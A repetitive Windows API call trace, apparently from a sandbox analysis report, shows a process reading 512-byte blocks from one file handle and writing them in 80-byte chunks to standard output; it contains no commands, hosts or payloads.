GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.023] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 
[0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.024] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.024] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] GetFileType (hFile=0x50) returned 0x1 [0195.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.024] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.025] GetFileType (hFile=0x50) returned 0x1 [0195.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.025] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.047] GetFileType (hFile=0x50) returned 0x1 [0195.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.047] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.062] GetFileType (hFile=0x50) returned 0x1 [0195.062] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.062] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.063] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.063] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType (hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] GetFileType 
(hFile=0x50) returned 0x1 [0195.063] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.063] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.064] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.064] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.064] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] GetFileType (hFile=0x50) returned 0x1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.064] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.064] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.065] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.065] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 
[0195.065] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.065] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.065] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.066] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.066] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.066] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.066] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.067] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.067] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, 
lpOverlapped=0x0) returned 1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.067] GetFileType (hFile=0x50) returned 0x1 [0195.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 
| out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] GetFileType (hFile=0x50) returned 0x1 [0195.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.068] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.068] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.068] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle 
